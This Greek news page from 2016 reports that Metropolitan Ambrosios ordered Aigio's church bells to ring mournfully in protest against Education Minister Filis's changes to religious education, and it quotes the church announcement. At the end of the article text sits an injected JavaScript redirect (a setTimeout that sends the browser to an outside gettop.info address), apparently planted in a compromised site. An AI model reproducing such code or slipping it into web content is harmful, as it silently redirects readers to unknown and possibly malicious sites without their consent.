Αμβρόσιος διέταξε να… χτυπήσουν οι καμπάνες πένθιμα, λόγω Φίλη

0
10

 

Να χτυπήσουν σε πένθιμο τέμπο οι καμπάνες στο Αίγιο το Σάββατο στις 11 το πρωί και για μισή ώρα, διέταξε ο μητροπολίτης Αμβρόσιος.

Mε σκοπό, όπως ανακοινώθηκε από την Ιερά Μητρόπολη, «την έντονη διαμαρτυρία της τοπικής Εκκλησίας και του λαού απέναντι στην προσπάθεια της κυβέρνησης, δια του Υπουργού Παιδείας κ. Νικολάου Φίλη, να υποβαθμίσει και να περιθωριοποιήσει την Ορθόδοξη Εκκλησία, να προσβάλλει το Ορθόδοξο φρόνημα και τη συνείδηση του πιστού Ελληνικού Λαού».

Αναλυτικά η ανακοίνωση: Ενημερώνουμε τους ευσεβείς μας χριστιανούς, ότι αύριο Σάββατο 24 Σεπτεμβρίου 2016, οι καμπάνες των Ιερών Ναών της πόλεως του Αιγίου θα ηχήσουν πένθιμα για ένα ημίωρο, από 11 έως 11.30 π.μ. με σκοπό την έντονη διαμαρτυρία της τοπικής μας Εκκλησίας και του λαού μας απέναντι στην προσπάθεια της Κυβερνήσεως διά του Υπουργού Παιδείας κ. Νικολάου Φίλη να υποβαθμίσει και να περιθωριοποιήσει την Ορθόδοξη Εκκλησία, να προσβάλλει το Ορθόδοξο φρόνημα και τη συνείδηση του πιστού Ελληνικού Λαού, ασκώντας μία χωρίς προηγούμενο λυσσαλέα, έντονη και σκληρή πολεμική εναντίον της Εκκλησίας της Ελλάδος, η οποία εκφράζεται τόσο με μία σειρά μέτρων, όπως η μεταβολή και υποβάθμιση του μαθήματος των θρησκευτικών σε θρησκειολογικό, η δημιουργία ενός ουδετερόθρησκου Κράτους, αλλά και μέσω των προκλητικών και ανιστόρητων δηλώσεων του Υπουργού Παιδείας διά των οποίων αλλοιώνει και αμφισβητεί τον ιστορικό, θυσιαστικό και εθνικό ρόλο της Εκκλησίας σε δύσκολες περιόδους της Ελληνικής ιστορίας. Η αφύπνιση του λαού μας και η διαφύλαξη της εθνικής, εκκλησιαστικής και πολιτισμικής μας ταυτότητας προβάλλει πλέον στις μέρες μας περισσότερο αναγκαία και επιτακτική. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here